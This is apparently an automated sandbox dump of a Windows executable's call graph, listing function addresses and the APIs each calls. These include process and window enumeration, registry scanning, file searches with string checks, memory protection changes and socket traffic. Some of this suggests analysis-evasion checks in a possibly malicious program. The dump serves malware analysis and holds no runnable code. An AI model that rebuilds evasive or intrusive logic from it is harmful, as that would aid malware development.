80775e 90285->90288 90290 8076d3 send 90286->90290 90291 80770b 90286->90291 90300 8072a0 50 API calls 90287->90300 90288->90269 90288->90270 90290->90287 90301 8072a0 50 API calls 90291->90301 90292 807704 90292->90288 90294 80771c __acrt_iob_func 90302 80cb20 78 API calls 90294->90302 90296 80773c fflush _errno 90296->90288 90297->90274 90298->90278 90299->90281 90300->90292 90301->90294 90302->90296 91504 837090 strlen memcpy EnterCriticalSection 91653 801296 7 API calls 91654 8a8a90 memcpy _byteswap_uint64 91656 8ec290 283 API calls 91657 8356a0 102 API calls 91658 84caa0 288 API calls 91660 9726b0 24 API calls 91661 a73680 66 API calls 91662 b77690 7 API calls 91508 803cab 187 API calls 91510 8020ad 124 API calls 91145 803ab0 AcquireSRWLockExclusive 91146 803ac3 91145->91146 91147 803acb ReleaseSRWLockExclusive 91145->91147 91146->91147 91148 803ad6 91146->91148 91152 81d7b0 91148->91152 91150 803aeb 91151 803af3 ReleaseSRWLockExclusive 91150->91151 91153 81d7d9 91152->91153 91154 81d7be FreeLibrary 91152->91154 91155 81d7e0 WSACleanup 91153->91155 91156 81d7de 91153->91156 91154->91153 91156->91150 91171 836ab0 91181 8c0870 EnterCriticalSection LeaveCriticalSection 91171->91181 91173 836ad5 91174 836bb4 91173->91174 91176 816fa0 9 API calls 91173->91176 91175 8b5ed0 87 API calls 91174->91175 91177 836ba9 91175->91177 91178 836b54 91176->91178 91178->91174 91178->91177 91179 836b5d 91178->91179 91179->91177 91182 8b5ed0 91179->91182 91181->91173 91185 8b5a50 91182->91185 91186 8b5a58 91185->91186 91187 8b5ea9 91185->91187 91218 8c86d0 EnterCriticalSection 91186->91218 91187->91179 91189 8b5a71 91190 8c88b0 2 API calls 91189->91190 91191 8b5a7e 91190->91191 91192 8b5a99 91191->91192 91196 8b5b50 91191->91196 91198 8b5b88 91191->91198 91223 8bd920 memset 91192->91223 91194 8b5aa2 91194->91198 91234 8bda40 memmove 91194->91234 91195 8b5cae 91197 8b5e96 91195->91197 91210 8b5da1 __WSAFDIsSet 91195->91210 91215 8b5d3f WSAGetLastError 91195->91215 91219 8ca920 91195->91219 91251 8b6d50 43 API calls 91195->91251 91252 8c9320 91195->91252 91196->91198 91202 8b5b7a 91196->91202 91203 8b5eb4 91196->91203 91258 8c9480 QueryPerformanceFrequency QueryPerformanceCounter closesocket 91197->91258 91198->91195 91250 8b6d50 43 API calls 91198->91250 91201 8b5ea0 91259 8c86f0 LeaveCriticalSection 91201->91259 91224 8b70a0 91202->91224 91205 8b6f10 78 API calls 91203->91205 91207 8b5ec2 91205->91207 91207->91207 91209 8b5be2 __WSAFDIsSet 91211 8b5bac 91209->91211 91210->91195 91211->91198 91211->91209 91212 8b70a0 78 API calls 91211->91212 91235 8b6f10 91211->91235 91212->91211 91215->91195 91218->91189 91220 8ca944 91219->91220 91221 8ca94b 91220->91221 91222 8ca977 send 91220->91222 91221->91195 91222->91195 91223->91194 91232 8b70ae 91224->91232 91225 8b717f WSAGetLastError 91226 8b718b 91225->91226 91228 8b71a7 91226->91228 91298 8b6d50 43 API calls 91226->91298 91228->91198 91230 8b719f 91231 8c9320 3 API calls 91230->91231 91231->91228 91232->91225 91232->91228 91260 8ca8c0 91232->91260 91264 8b71c0 91232->91264 91234->91211 91236 8b6f35 91235->91236 91249 8b7019 91236->91249 91313 8ca870 91236->91313 91238 8b6f4e 91240 8b702d 91238->91240 91244 8b6f61 91238->91244 91239 8c9320 3 API calls 91245 8b701d 91239->91245 91241 8b705d WSAGetLastError 91240->91241 91242 8b703d 91240->91242 91241->91242 91242->91245 91317 8b6d50 43 API calls 91242->91317 91244->91245 91246 8b71c0 75 API calls 91244->91246 91247 8b7082 91244->91247 91245->91211 91246->91244 91318 8b6d50 43 API calls 91247->91318 91249->91239 91250->91198 91251->91195 91254 8c9345 91252->91254 91253 8c88b0 2 API calls 91256 8c93af 91253->91256 91254->91253 91319 8cb020 91256->91319 91257 8c9422 91257->91195 91258->91201 91259->91187 91261 8ca8e6 91260->91261 91262 8ca903 recvfrom 91260->91262 91261->91262 91263 8ca8ed 91261->91263 91262->91263 91263->91232 91265 8c17d0 6 API calls 91264->91265 91272 8b71e6 91265->91272 91266 8b71f2 91266->91232 91267 8b731d 91299 8cbc80 91267->91299 91269 8b739d 91271 8b73c9 91269->91271 91278 8b73e3 91269->91278 91270 8b734e 91270->91266 91270->91269 91279 8b74c2 91270->91279 91277 8b6050 60 API calls 91271->91277 91272->91266 91272->91267 91273 8b72f9 _stricmp 91272->91273 91275 8b731f strcmp 91272->91275 91273->91266 91273->91272 91274 8b7417 91303 8b7b10 17 API calls 91274->91303 91275->91266 91275->91272 91277->91266 91278->91274 91280 8b740d 91278->91280 91279->91271 91283 8b74d1 91279->91283 91308 8b6d50 43 API calls 91280->91308 91282 8b7422 91284 8b7460 91282->91284 91294 8b74b0 91282->91294 91304 8bf180 memset memset 91282->91304 91307 8b6ca0 memset memset WakeAllConditionVariable QueryPerformanceFrequency QueryPerformanceCounter 91283->91307 91284->91294 91305 8c5ca0 memset 91284->91305 91288 8b7572 91311 8bf400 memset memset 91288->91311 91290 8b7498 91290->91294 91306 8bc2d0 37 API calls 91290->91306 91293 8b74a9 91293->91294 91309 8c6150 memmove 91293->91309 91310 8cc320 QueryPerformanceFrequency QueryPerformanceCounter 91294->91310 91296 8b758c 91312 8c8880 WakeAllConditionVariable 91296->91312 91298->91230 91300 8cbca1 91299->91300 91301 8cbd99 memcpy 91300->91301 91302 8cbcf1 91300->91302 91301->91302 91302->91270 91303->91282 91304->91284 91305->91290 91306->91293 91307->91266 91308->91266 91309->91294 91310->91288 91311->91296 91312->91266 91314 8ca88c 91313->91314 91315 8ca8aa recv 91313->91315 91314->91315 91316 8ca893 91314->91316 91315->91238 91316->91238 91317->91249 91318->91249 91320 8cb029 91319->91320 91321 8cb052 91319->91321 91322 8cb04b closesocket 91320->91322 91323 8cb03e 91320->91323 91321->91257 91322->91321 91323->91257 91665 848ab0 125 API calls 91511 95eca0 21 API calls 91668 972ea0 32 API calls 91513 987ca0 42 API calls 91514 812cc0 99 API calls 91515 8370c0 14 API calls 91669 978ed0 24 API calls 91672 8c72c0 memset memcpy memmove 91518 8024d1 strstr 91673 8122d0 54 API calls 91520 9220c0 46 API calls 91674 822ed0 87 API calls 91675 b39ae0 memcpy memcpy memset memset 91522 87e4d0 207 API calls 91676 801ad9 126 API calls 91677 9caac0 42 API calls 91523 8014e0 GetModuleHandleA LoadLibraryA GetProcAddress GetProcAddress _crt_atexit 91525 8148e0 84 API calls 91678 8016e3 realloc memcpy 91528 95f0f0 26 API calls 91679 956ef0 34 API calls 91682 8042f0 158 API calls 91683 81c6f0 87 API calls 91684 8516f0 83 API calls 91686 8e2af0 141 API calls 91532 801001 _set_app_type __p__fmode __p__commode _set_app_type __setusermatherr 89917 83e400 89918 83e412 89917->89918 89925 83e459 89917->89925 89920 83e422 89918->89920 89948 853030 50 API calls 89918->89948 89919 83e4a8 89949 8609d0 50 API calls 89920->89949 89923 83e42b 89950 8368b0 58 API calls 89923->89950 89925->89919 89928 83e495 89925->89928 89929 83b5a0 89925->89929 89927 83b5a0 54 API calls 89927->89919 89928->89919 89928->89927 89930 83b5d2 89929->89930 89931 83b5c0 89929->89931 89930->89928 89931->89930 89932 81d8c0 2 API calls 89931->89932 89933 83b5f2 89932->89933 89934 83b611 89933->89934 89935 83b638 89933->89935 89951 83ec70 QueryPerformanceCounter GetTickCount 89934->89951 89952 83ec10 QueryPerformanceCounter GetTickCount 89935->89952 89938 83b61b 89939 83b713 89938->89939 89942 83b626 89938->89942 89954 844f40 52 API calls 89939->89954 89941 83b65a 89941->89930 89943 83b72b 89941->89943 89944 83b737 89941->89944 89942->89930 89942->89941 89942->89943 89942->89944 89953 8450a0 51 API calls 89942->89953 89943->89930 89955 8450a0 51 API calls 89943->89955 89944->89930 89956 8450a0 51 API calls 89944->89956 89948->89920 89949->89923 89950->89925 89951->89938 89952->89942 89953->89942 89954->89930 89955->89930 89956->89930 91534 852c00 100 API calls 91535 96f810 26 API calls 91688 b84230 free free free free 91689 8b2600 memcpy _assert 91691 9d2e10 45 API calls 91536 804810 96 API calls 91537 822410 108 API calls 91693 823610 53 API calls 91694 a38630 qsort 91538 95a400 41 API calls 91539 866810 21 API calls 91540 b88820 __stdio_common_vsprintf 91696 9e0200 30 API calls 91697 805220 112 API calls 91698 822e20 88 API calls 91542 962430 69 API calls 91699 b84610 43 API calls 91543 806c30 161 API calls 91544 801830 8 API calls 91700 a1fa10 136 API calls 91701 822230 55 API calls 91703 84d630 157 API calls 91547 850030 94 API calls 91704 956220 32 API calls 91705 c96a70 17 API calls 91707 8eee30 282 API calls 91708 90da50 48 API calls 91548 801441 _cexit 91709 83d240 53 API calls 91710 9a9a50 40 API calls 91711 9e2a50 22 API calls 91712 9f5650 memcmp 91550 805850 83 API calls 91553 837050 44 API calls 91715 852250 53 API calls 91554 b70460 8 API calls 91717 b8ba60 6 API calls 91556 9f8040 102 API calls 91719 9c5670 45 API calls 91558 8eb060 strlen memcpy 91559 a28050 43 API calls 91560 928060 free 91724 8daa70 memcmp memcmp memcmp 91726 82e380 106 API calls 91563 861580 151 API calls 91728 8c4b80 9 API calls 91564 9f3590 23 API calls 91566 90a580 25 API calls 91567 a075b0 50 API calls 91730 804390 91 API calls 91568 837190 83 API calls 91732 956f80 47 API calls 91569 872590 155 API calls 91734 8a6b90 memcpy memcpy 91572 8cd990 memset 91573 9e2580 24 API calls 90893 8075a0 90894 8075d4 90893->90894 90895 8075aa 90893->90895 90895->90894 90896 8075c1 90895->90896 90899 8072a0 50 API calls 90896->90899 90898 8075d1 90898->90894 90899->90898 91574 82c5a0 90 API calls 91575 8011a3 157 API calls 91738 93a7b0 60 API calls 91739 83d7a0 87 API calls 91740 a37b80 22 API calls 91741 9727b0 _time64 _gmtime64 90914 9847b0 90940 9de5d0 strlen MultiByteToWideChar 90914->90940 90917 9847df 90953 97d520 20 API calls 90917->90953 90918 984824 90954 9b7120 20 API calls 90918->90954 90921 984829 90955 9b7220 20 API calls 90921->90955 90922 9847ed 90924 9847f8 90922->90924 90925 98488d fclose 90922->90925 90925->90924 90926 98483a GetLastError 90956 9b7310 20 API calls 90926->90956 90928 984852 _errno 90929 98486b 90928->90929 90930 984860 _errno 90928->90930 90957 9b7120 20 API calls 90929->90957 90930->90929 90931 984898 90930->90931 90959 9b7120 20 API calls 90931->90959 90934 984870 90958 9b7220 20 API calls 90934->90958 90935 98489d 90960 9b7220 20 API calls 90935->90960 90937 984881 90961 9b7310 20 API calls 90937->90961 90941 9de6b0 GetLastError 90940->90941 90944 9de608 90940->90944 90942 9de6bd MultiByteToWideChar 90941->90942 90943 9de6e2 GetLastError 90941->90943 90942->90943 90942->90944 90945 9de6f4 fopen 90943->90945 90946 9847c4 strchr 90943->90946 90947 9de622 MultiByteToWideChar 90944->90947 90945->90946 90946->90917 90946->90918 90947->90946 90948 9de649 strlen MultiByteToWideChar 90947->90948 90948->90946 90949 9de673 _wfopen 90948->90949 90949->90946 90950 9de685 _errno 90949->90950 90951 9de6a0 fopen 90950->90951 90952 9de690 _errno 90950->90952 90951->90946 90952->90946 90952->90951 90953->90922 90954->90921 90955->90926 90956->90928 90957->90934 90958->90937 90959->90935 90960->90937 90961->90924 91130 9dc9b0 91131 9dc9e5 91130->91131 91135 9dc9cb 91130->91135 91132 9dca36 91131->91132 91133 9dc9f9 malloc 91131->91133 91134 9dc9e1 91133->91134 91133->91135 91135->91134 91142 9b7120 20 API calls 91135->91142 91137 9dca13 91143 9b7220 20 API calls 91137->91143 91139 9dca1c 91144 9b7310 20 API calls 91139->91144 91141 9dca2d 91142->91137 91143->91139 91144->91141 91576 8da9a0 20 API calls 91742 806bb0 84 API calls 91743 91fba0 27 API calls 91157 b98d8a LoadLibraryA 91158 b99090 __acrt_iob_func fwrite 91157->91158 91159 b98de0 GetProcAddress GetProcAddress 91157->91159 91160 b99021 91158->91160 91161 b990c8 __acrt_iob_func fwrite FreeLibrary 91159->91161 91162 b98e1e 91159->91162 91163 b99212 91160->91163 91164 b99032 91160->91164 91161->91160 91162->91161 91168 b98e26 91162->91168 91165 b88f70 8 API calls 91163->91165 91166 b99217 __acrt_iob_func fwrite 91165->91166 91167 b98fe8 __acrt_iob_func fwrite FreeLibrary 91167->91160 91168->91167 91169 b99110 __acrt_iob_func fwrite FreeLibrary 91168->91169 91170 b98eac 91168->91170 91169->91160 91170->91167 91579 852db0 98 API calls 91580 86f5b0 140 API calls 91581 a8e990 62 API calls 91744 b84380 _stat64 91583 80d5c0 52 API calls 91746 91e7d0 133 API calls 91747 9263d0 25 API calls 91748 a2cbe0 21 API calls 91749 9733d0 _gmtime64 90038 8013c9 90039 8013d0 90038->90039 90040 8013e3 90039->90040 90041 8011da 90039->90041 90088 b88a20 131 API calls 90040->90088 90042 801460 _initterm 90041->90042 90043 8011e7 90041->90043 90046 801483 exit 90042->90046 90045 8013fd _initterm 90043->90045 90049 8011ff 90043->90049 90045->90049 90065 b893e0 90049->90065 90050 801231 SetUnhandledExceptionFilter _set_invalid_parameter_handler 90079 b89210 90050->90079 90052 801257 __p__acmdln 90055 80126e malloc 90052->90055 90054 801300 90056 801318 strlen malloc memcpy 90054->90056 90055->90046 90055->90054 90056->90056 90057 80134e 90056->90057 90080 b89060 90057->90080 90059 801367 90085 c986d0 90059->90085 90072 b89400 90065->90072 90078 b893f3 90065->90078 90066 b89688 90067 b89699 90066->90067 90066->90078 90069 b896c7 90067->90069 90089 b89280 13 API calls 90067->90089 90090 b89220 13 API calls 90069->90090 90071 b896df 90071->90050 90072->90066 90072->90069 90074 b894e2 90072->90074 90077 b895b8 90072->90077 90072->90078 90073 b89280 13 API calls 90073->90074 90074->90072 90074->90073 90075 b89220 13 API calls 90074->90075 90075->90074 90076 b895ea VirtualProtect 90076->90077 90077->90076 90077->90078 90078->90050 90079->90052 90081 b89069 90080->90081 90082 b89000 90080->90082 90081->90059 90082->90082 90091 8014c0 _crt_atexit 90082->90091 90084 b89030 90084->90059 90086 b89060 _crt_atexit 90085->90086 90087 c9870b 90086->90087 90088->90043 90089->90067 90090->90071 90091->90084 91587 9f61d0 55 API calls 91588 9039c0 134 API calls 91589 8039d0 111 API calls 91750 8367d0 169 API calls 91591 8625d0 129 API calls 90526 8031d7 CreateToolhelp32Snapshot 90527 803223 90526->90527 90533 803200 90526->90533 90539 c927f0 90527->90539 90530 8032dc CloseHandle 90552 c92be0 90530->90552 90536 803255 90537 c92be0 13 API calls 90536->90537 90538 8032bc Process32Next 90536->90538 90542 c92ac0 malloc 90536->90542 90549 c92b50 strlen 90536->90549 90550 c929f0 malloc 90536->90550 90537->90536 90538->90530 90538->90536 90561 c92810 malloc 90539->90561 90543 c92b1e 90542->90543 90544 c92ad4 90542->90544 90543->90536 90569 c96ff0 calloc calloc free 90544->90569 90546 c92b15 90546->90543 90570 c98260 90546->90570 90551 c92a0e 90550->90551 90551->90536 90553 c92bfc 90552->90553 90554 c92c48 _strdup 90553->90554 90555 c92c1b 90553->90555 90560 c92c31 90553->90560 90556 c92c54 90554->90556 90554->90560 90555->90560 90573 c93270 90555->90573 90585 c97280 7 API calls 90556->90585 90559 c92c73 90559->90533 90560->90533 90562 803232 Process32First 90561->90562 90563 c92824 90561->90563 90562->90530 90562->90536 90568 c904d0 malloc malloc free 90563->90568 90565 c92865 90566 c92869 90565->90566 90567 c92878 free 90565->90567 90566->90562 90567->90562 90568->90565 90569->90546 90571 c92b34 free _errno 90570->90571 90572 c9826c free 90570->90572 90571->90543 90572->90571 90574 c9327d 90573->90574 90575 c932e0 90574->90575 90576 c93290 90574->90576 90587 c90310 free 90575->90587 90578 c932c8 90576->90578 90579 c93295 90576->90579 90580 c932cf free 90578->90580 90581 c932a5 90578->90581 90579->90581 90586 c971e0 free 90579->90586 90580->90581 90583 c98260 free 90581->90583 90584 c932b0 free 90583->90584 90584->90560 90585->90559 91592 87edd0 75 API calls 91751 801bdb AcquireSRWLockExclusive ReleaseSRWLockExclusive ReleaseSRWLockExclusive FreeLibrary WSACleanup 90819 9dcbc0 90820 9dcbcc 90819->90820 90821 9dcbce free 90819->90821 90820->90821 91594 9e71c0 54 API calls 91754 8047e0 QueryPerformanceCounter GetTickCount 90900 81d5e0 90901 81d5f0 90900->90901 90902 81d652 WSAStartup 90900->90902 90912 81d690 94 API calls 90901->90912 90904 81d670 90902->90904 90905 81d664 90902->90905 90904->90901 90907 81d67c WSACleanup 90904->90907 90906 81d5fa 90908 81d606 GetProcAddress 90906->90908 90909 81d616 90906->90909 90908->90909 90913 827620 11 API calls 90909->90913 90911 81d636 QueryPerformanceFrequency 90912->90906 90913->90911 91755 8227e0 98 API calls 91756 8564d8 100 API calls 91757 95abf0 69 API calls 91758 b887d0 __stdio_common_vswprintf 91597 91f5e0 52 API calls 91760 817bf0 82 API calls 91761 a487d0 31 API calls 91598 95a9e0 104 API calls 91599 a6e5d0 memcpy memcpy memcpy 91600 87d1f0 184 API calls 91601 8035f7 strlen realloc strncat 91451 8029ff FindFirstFileA 91452 802a31 91451->91452 91498 c92b50 strlen 91452->91498 91454 802a45 91455 c92be0 13 API calls 91454->91455 91456 802a5c RegOpenKeyExA 91455->91456 91457 802a93 91456->91457 91458 c92b50 strlen 91457->91458 91459 802aa7 91458->91459 91460 c92be0 13 API calls 91459->91460 91461 802abe CharUpperA strstr 91460->91461 91463 802b0e 91461->91463 91464 c92b50 strlen 91463->91464 91465 802b22 91464->91465 91466 c92be0 13 API calls 91465->91466 91467 802b39 CreateToolhelp32Snapshot Process32First 91466->91467 91468 802b94 91467->91468 91469 802ba5 QueryFullProcessImageNameA 91467->91469 91468->91469 91471 802bb0 Process32Next 91468->91471 91472 802c3b CloseHandle strstr 91469->91472 91471->91468 91471->91469 91473 802c68 91472->91473 91474 c92b50 strlen 91473->91474 91475 802c7c 91474->91475 91476 c92be0 13 API calls 91475->91476 91477 802c93 CreateToolhelp32Snapshot Process32First 91476->91477 91478 802d99 91477->91478 91479 802cef strncpy 91477->91479 91480 c92b50 strlen 91478->91480 91482 802d31 strstr 91479->91482 91481 802dda 91480->91481 91483 c92be0 13 API calls 91481->91483 91482->91478 91484 802d4b strstr 91482->91484 91485 802df1 CloseHandle EnumWindows 91483->91485 91484->91478 91486 802d65 strstr 91484->91486 91487 802e30 91485->91487 91486->91478 91488 802d7f strstr 91486->91488 91490 c92b50 strlen 91487->91490 91488->91478 91489 802daf Process32Next 91488->91489 91489->91478 91489->91479 91491 802e44 91490->91491 91492 c92be0 13 API calls 91491->91492 91493 802e5b 91492->91493 91494 c92b50 strlen 91493->91494 91495 802ef7 91494->91495 91496 c92be0 13 API calls 91495->91496 91497 802f0e 91496->91497 91602 813900 51 API calls 91764 81e300 269 API calls 91603 804906 50 API calls 91766 965310 21 API calls 91605 8cb900 12 API calls 91768 8cfb00 15 API calls 90231 9dd910 90232 9dd91d 90231->90232 90238 9dca40 90231->90238 90250 9dca40 26 API calls 90232->90250 90234 9dca5b 90239 9dcaac 90234->90239 90241 9dca71 90234->90241 90235 9dca75 90236 9dd92e 90237 9dca8b malloc 90237->90239 90240 9dca98 memset 90237->90240 90238->90234 90238->90235 90238->90237 90239->90235 90247 9b7120 20 API calls 90239->90247 90241->90235 90241->90240 90243 9dcab7 90248 9b7220 20 API calls 90243->90248 90245 9dcac0 90249 9b7310 20 API calls 90245->90249 90247->90243 90248->90245 90249->90235 90250->90236 91769 80230e 179 API calls 91770 8fb300 140 API calls 90251 807310 90252 807320 90251->90252 90253 807332 90251->90253 90252->90253 90254 807390 90252->90254 90257 807383 90253->90257 90258 807366 90253->90258 90264 8072a0 50 API calls 90254->90264 90256 8073a1 __acrt_iob_func 90265 80cb20 78 API calls 90256->90265 90263 8072a0 50 API calls 90258->90263 90261 8073c1 fflush _errno 90261->90257 90262 807380 90262->90257 90263->90262 90264->90256 90265->90261 91772 803b10 86 API calls 91607 836910 58 API calls 91608 801114 6 API calls 91774 b45320 44 API calls 91609 852110 _time64 90588 802f17 90589 c927f0 5 API calls 90588->90589 90590 802f2c 90589->90590 90591 c92be0 13 API calls 90590->90591 90597 802f49 90591->90597 90592 8031d3 90595 80315c RegEnumKeyExA 90595->90597 90596 801619 32 API calls 90598 803046 RegOpenKeyExA 90596->90598 90597->90592 90597->90595 90597->90596 90600 80313b RegCloseKey 90597->90600 90601 c92ac0 7 API calls 90597->90601 90603 c92be0 13 API calls 90597->90603 90604 c929f0 malloc 90597->90604 90605 801619 90597->90605 90608 c92b50 strlen 90597->90608 90598->90597 90599 803089 RegQueryValueExA 90598->90599 90599->90597 90599->90600 90600->90597 90601->90597 90603->90597 90604->90597 90606 b91360 32 API calls 90605->90606 90607 801645 RegOpenKeyExA 90606->90607 90607->90597 91775 976b00 40 API calls 91776 98a700 30 API calls 91777 8c8710 6 API calls 91612 a6e138 52 API calls 91778 9fcb00 24 API calls 91613 816520 156 API calls 91779 924330 21 API calls 91780 826720 146 API calls 91616 837120 13 API calls 91619 8a4920 14 API calls 90962 8b4720 90963 8b4728 90962->90963 90964 8b4733 90963->90964 90965 8b4fe0 memset 90963->90965 90966 8b4745 90965->90966 90967 8b477d 90966->90967 90997 8c85e0 memset InitializeCriticalSection InitializeConditionVariable DeleteCriticalSection 90966->90997 90969 8b4765 90970 8b476c 90969->90970 90998 8c8a80 7 API calls 90969->90998 90993 8b4878 90970->90993 91036 8b30a0 27 API calls 90970->91036 90972 8b4791 90972->90970 90999 8bed80 memset 90972->90999 90974 8b4774 90976 8b47b0 90976->90970 90977 8be730 memset 90976->90977 90978 8b47c4 90977->90978 90978->90970 91000 8be530 memset _time64 90978->91000 90980 8b47d8 90980->90970 91001 8bed80 memset 90980->91001 90982 8b47f7 90982->90970 91002 8be000 memset _time64 90982->91002 90984 8b480f 90984->90970 91003 8b5540 22 API calls 90984->91003 90986 8b482e 90986->90970 91004 8b7720 memset memset memset _time64 90986->91004 90988 8b484f 90988->90970 91005 8b9270 90988->91005 90990 8b4860 91020 8b4950 90990->91020 90995 8b4886 90995->90970 91038 8bf5f0 15 API calls 90995->91038 90997->90969 90998->90972 90999->90976 91000->90980 91001->90982 91002->90984 91003->90986 91004->90988 91039 8ba440 91005->91039 91007 8b9297 91012 8b92ab 91007->91012 91116 8b9b60 10 API calls 91007->91116 91009 8b92a4 91009->91012 91117 8c86d0 EnterCriticalSection 91009->91117 91011 8b92f3 91014 8b930c 91011->91014 91118 8bbbe0 20 API calls 91011->91118 91012->90990 91015 8c78a0 2 API calls 91014->91015 91016 8b93d5 91014->91016 91018 8b936a 91014->91018 91015->91018 91119 8c86f0 LeaveCriticalSection 91016->91119 91018->91016 91019 8b93b1 memcpy 91018->91019 91019->91016 91021 8b4966 91020->91021 91022 8b4a14 htonl 91021->91022 91024 8b49b9 91021->91024 91033 8b486a 91021->91033 91128 8bb590 7 API calls 91022->91128 91028 8b4aa0 gethostname 91024->91028 91024->91033 91035 8b49c5 91024->91035 91025 8b4a3e 91025->91033 91129 8bbbe0 20 API calls 91025->91129 91026 8c78a0 2 API calls 91026->91033 91029 8b4ab3 WSAGetLastError 91028->91029 91030 8b4b35 strchr 91028->91030 91029->91024 91029->91030 91032 8b4b4f 91030->91032 91030->91035 91032->91033 91034 8c78a0 2 API calls 91032->91034 91033->90970 91033->90993 91037 8bfa20 9 API calls 91033->91037 91034->91035 91035->91026 91035->91033 91036->90974 91037->90995 91038->90970 91040 8ba46b 91039->91040 91041 8ba4db 91040->91041 91045 8ba48b GetAdaptersAddresses 91040->91045 91069 8bad14 91041->91069 91120 8ccb10 GetVersionExA 91041->91120 91043 8ba9fa 91044 8baa03 RegOpenKeyExA 91043->91044 91043->91069 91046 8bab70 RegOpenKeyExA 91044->91046 91047 8baa27 RegQueryValueExA 91044->91047 91072 8ba4a6 91045->91072 91101 8ba53f 91045->91101 91048 8bab90 RegQueryValueExA 91046->91048 91049 8bac34 RegOpenKeyExA 91046->91049 91050 8baacc RegQueryValueExA 91047->91050 91051 8baa71 91047->91051 91052 8babd2 91048->91052 91053 8bac26 RegCloseKey 91048->91053 91056 8bacf8 RegOpenKeyExA 91049->91056 91057 8bac54 RegQueryValueExA 91049->91057 91054 8bab0e 91050->91054 91055 8bab66 RegCloseKey 91050->91055 91051->91050 91066 8baa85 RegQueryValueExA 91051->91066 91052->91053 91071 8babe2 RegQueryValueExA 91052->91071 91053->91049 91054->91055 91068 8bab1e RegQueryValueExA 91054->91068 91055->91046 91059 8bad56 RegEnumKeyExA 91056->91059 91056->91069 91061 8bacea RegCloseKey 91057->91061 91062 8bac96 91057->91062 91058 8ba87d qsort 91077 8ba520 91058->91077 91105 8ba8a0 91058->91105 91064 8bad9b 91059->91064 91065 8bb15d RegCloseKey 91059->91065 91060 8ba4f3 GetAdaptersAddresses 91063 8ba505 91060->91063 91060->91101 91061->91056 91062->91061 91074 8baca6 RegQueryValueExA 91062->91074 91073 8ba527 GetAdaptersAddresses 91063->91073 91063->91077 91070 8bae16 RegOpenKeyExA 91064->91070 91065->91069 91067 8baab3 91066->91067 91067->91050 91075 8bab5b 91068->91075 91076 8bab4c 91068->91076 91069->91007 91080 8baddf RegEnumKeyExA 91070->91080 91081 8bae34 RegQueryValueExA 91070->91081 91078 8bac1b 91071->91078 91079 8bac0c 91071->91079 91072->91060 91072->91077 91073->91077 91073->91101 91082 8bacdf 91074->91082 91083 8bacd0 91074->91083 91075->91055 91125 8bb1e0 strlen strncat strlen 91076->91125 91077->91041 91124 8bb830 26 API calls 91077->91124 91078->91053 91126 8bb1e0 strlen strncat strlen 91079->91126 91080->91070 91088 8bb155 91080->91088 91089 8baf43 RegQueryValueExA 91081->91089 91108 8badbc 91081->91108 91082->91061 91127 8bb1e0 strlen strncat strlen 91083->91127 91086 8ba8f0 strcmp 91086->91105 91088->91065 91091 8bb052 RegQueryValueExA 91089->91091 91089->91108 91093 8badc7 RegCloseKey 91091->91093 91091->91108 91092 8ba794 GetBestRoute2 91094 8bd190 36 API calls 91092->91094 91093->91080 91094->91101 91095 8bae91 RegQueryValueExA 91095->91108 91096 8bafa0 RegQueryValueExA 91096->91108 91097 8c7890 strlen 91097->91105 91098 8ba81e htons 91098->91101 91099 8bb0af RegQueryValueExA 91099->91108 91100 8ba6c7 GetBestRoute2 91102 8bd190 36 API calls 91100->91102 91101->91058 91101->91077 91101->91092 91101->91098 91101->91100 91103 8ba746 htons 91101->91103 91104 8bb180 32 API calls 91101->91104 91102->91101 91103->91101 91104->91101 91105->91077 91105->91086 91105->91097 91106 8ba991 strlen 91105->91106 91107 8ba8b0 strncat 91105->91107 91106->91107 91107->91105 91108->91089 91108->91091 91108->91093 91108->91095 91108->91096 91108->91099 91109 8baf17 strlen 91108->91109 91110 8baf26 strncat 91108->91110 91111 8c7890 strlen 91108->91111 91112 8bb026 strlen 91108->91112 91113 8bb035 strncat 91108->91113 91114 8badaa strncat 91108->91114 91115 8bb141 strlen 91108->91115 91109->91110 91110->91108 91111->91108 91112->91113 91113->91108 91114->91108 91115->91114 91116->91009 91117->91011 91118->91014 91119->91012 91121 8ccb6a GetVersionExA 91120->91121 91122 8ccbbb 91120->91122 91121->91122 91123 8ccbd2 91121->91123 91122->91043 91123->91043 91124->91041 91125->91075 91126->91078 91127->91082 91128->91025 91129->91024 91781 8bdb20 memset memmove memmove memset 91782 8e3b20 140 API calls 91621 804530 52 API calls 91622 b0d100 43 API calls 91783 81f330 52 API calls 91784 826f30 92 API calls 91623 840d30 54 API calls 91786 b4ab00 62 API calls 91787 b5cb00 117 API calls 91788 95bb20 100 API calls 91791 883b30 86 API calls 91792 89a330 79 API calls 91793 803b40 AcquireSRWLockExclusive ReleaseSRWLockExclusive 91624 a3f560 68 API calls 91795 a3eb60 26 API calls 91796 835340 95 API calls 91798 87a340 645 API calls 89961 c98500 89978 b91360 89961->89978 89963 c98532 89964 c9853e 89963->89964 89985 b88f70 89963->89985 89967 b91360 32 API calls 89968 c98583 89967->89968 89969 c985d8 89968->89969 89970 c98588 89968->89970 89992 c98290 89969->89992 90000 b91420 33 API calls 89970->90000 89973 c9859c 89975 c985fd 89973->89975 89976 c98290 4 API calls 89973->89976 89974 c985ef 89975->89974 89977 c985bb free 89976->89977 89979 b91379 89978->89979 89980 b913b0 89978->89980 90001 b8d1d0 _errno 89979->90001 89982 b8d1d0 32 API calls 89980->89982 89984 b913d0 89982->89984 89983 b91398 89983->89963 89984->89963 90019 b88e90 _open 89985->90019 89987 b88f82 89988 b88e90 8 API calls 89987->89988 89989 b88fa2 89988->89989 89990 b88f70 8 API calls 89989->89990 89991 b88fb8 89990->89991 89991->89967 89993 c982f8 _errno 89992->89993 89994 c982a1 89992->89994 89996 c982ed 89993->89996 89994->89993 89995 c982af 89994->89995 89997 c982c7 memcpy 89995->89997 90032 c98200 89995->90032 89996->89974 89997->89996 90000->89973 90002 b8d3ae 90001->90002 90012 b8d287 90001->90012 90002->89983 90003 b8d340 fputc 90003->90012 90004 b8b640 fputc 90004->90012 90005 b8d504 localeconv 90016 b978b0 IsDBCSLeadByteEx MultiByteToWideChar MultiByteToWideChar _errno 90005->90016 90008 b8db9c 90018 b8b9d0 fputc fputc fputc 90008->90018 90009 b8ca50 29 API calls 90009->90012 90010 b8c9c0 28 API calls 90010->90012 90012->90002 90012->90003 90012->90004 90012->90005 90012->90008 90012->90009 90012->90010 90014 b8b9d0 fputc fputc fputc 90012->90014 90015 b8cc90 10 API calls 90012->90015 90017 b8b6a0 fputc fputc WideCharToMultiByte _errno 90012->90017 90013 b8dbb7 90013->89983 90014->90012 90015->90012 90016->90012 90017->90012 90018->90013 90021 b88eba 90019->90021 90020 b88ef3 _exit 90020->90021 90021->90020 